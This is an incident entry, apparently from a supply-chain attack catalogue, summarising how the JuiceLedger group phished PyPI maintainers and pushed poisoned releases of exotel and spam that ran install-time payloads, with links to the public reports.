JuiceLedger phished PyPI maintainers

The JuiceLedger PyPI incident began with a direct attack on maintainers rather than on the registry itself. Package owners received PyPI-themed phishing mail that claimed their projects needed validation. The login page was false; the credentials entered into it were real.

With those credentials, the attackers published malicious releases under legitimate package names. PyPI identified exotel 0.1.6 and spam 2.0.2 and 4.0.2 as poisoned releases, while also removing hundreds of typosquats that used the same install-time pattern but sit outside this dataset's scope.

The package payloads used setup-time execution as the first step. Installation collected host and environment details, contacted attacker-controlled infrastructure, and pulled a larger trojan onto developer workstations or CI runners. The useful moment for the attacker was not application runtime; it was the routine act of installing a package.

That is why this campaign remains a clean example of account compromise as supply-chain compromise. The registry did not need to be broken, and users did not need to mistype a package name. A maintainer account was enough to make trusted package coordinates deliver hostile code.

Actor

JuiceLedger

Attribution

Group

Cause

Unknown

• exotel 0.1.6
• spam 2.0.2, 4.0.2

• PyPI packages hijacked after developers fall for phishing emailsbleepingcomputer.com
• First Known Phishing Attack Against PyPi Userscheckmarx.com
• PyPI Phishing Campaign | JuiceLedger Threat Actor Pivots From Fake Apps to Supply Chain Attackssentinelone.com
• `exotel` project on PyPI compromised, malicious release madegithub.com
• `spam` project on PyPI compromised, malicious releases madegithub.com